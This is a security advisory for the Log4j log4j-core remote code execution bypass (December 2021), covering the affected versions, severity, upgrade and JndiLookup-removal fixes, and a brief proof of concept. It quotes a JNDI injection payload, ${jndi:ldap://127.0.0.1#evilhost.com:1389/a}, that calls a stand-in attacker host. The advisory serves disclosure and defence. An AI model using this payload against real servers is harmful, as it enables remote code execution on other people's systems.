Remote Code Execution (RCE) Affecting org.apache.logging.log4j:log4j-core package, versions [2.0-beta9,2.3.1) [2.4,2.12.2) [2.13.0,2.16.0)


0.0
critical
  • Exploit Maturity

    Proof of concept

  • Attack Complexity

    High

  • Scope

    Changed

  • Confidentiality

    High

  • Integrity

    High

  • Availability

    High

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications
  • snyk-id

    SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2320014

  • published

    14 Dec 2021

  • disclosed

    14 Dec 2021

  • credit

    Unknown

How to fix?

Upgrade org.apache.logging.log4j:log4j-core to version 2.3.1, 2.12.2, 2.16.0 or higher.

Overview

org.apache.logging.log4j:log4j-core is a logging library for Java.

Affected versions of this package are vulnerable to Remote Code Execution (RCE) if one of the following conditions is met:

  1. Logging configuration explicitly enables lookups – either by default (if using a version lower than 2.15.0) or manually by using %m{lookups} as formatMsgNoLookups is switched on by default as of version 2.15.0.
  2. Or uses a non-default Pattern Layout with Context Lookup where attackers can control input data via Thread Context Map (MDC),
  3. Or uses Logger.printf("%s", userInput) function where attackers can control the userInput variable.

A malicious actor is able to bypass the mitigation implemented in version 2.15.0 that limits JNDI lookups to localhost only: ${jndi:ldap://127.0.0.1#evilhost.com:1389/a}.

We recommend updating to version 2.16.0 which completely disables JNDI lookups by default. If upgrading is not an option, this issue can be mitigated in prior releases by removing the JndiLookup class from the classpath (example: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class).

PoC

In config:

<pattern>%d %p %c{1.} [%t] $${ctx:loginId} %m%n</pattern>

In code:

ThreadContext.put("loginId", UserControlledInput);

History

This vulnerability was previously assigned a CVSS score of 3.7 (Low), and the impact was believed to be Denial of Service (DoS).

Furthermore, the advisory previously mentioned Thread Context Map patterns (%X, %mdc, or %MDC) as being vulnerable to this issue, but that has since been proven wrong.

On December 17, 2021 new information came to light, demonstrating that an Arbitrary Code Execution vulnerability still exists in version 2.15.0 of Log4j due to a bypass to the localhost-only lookup mechanism.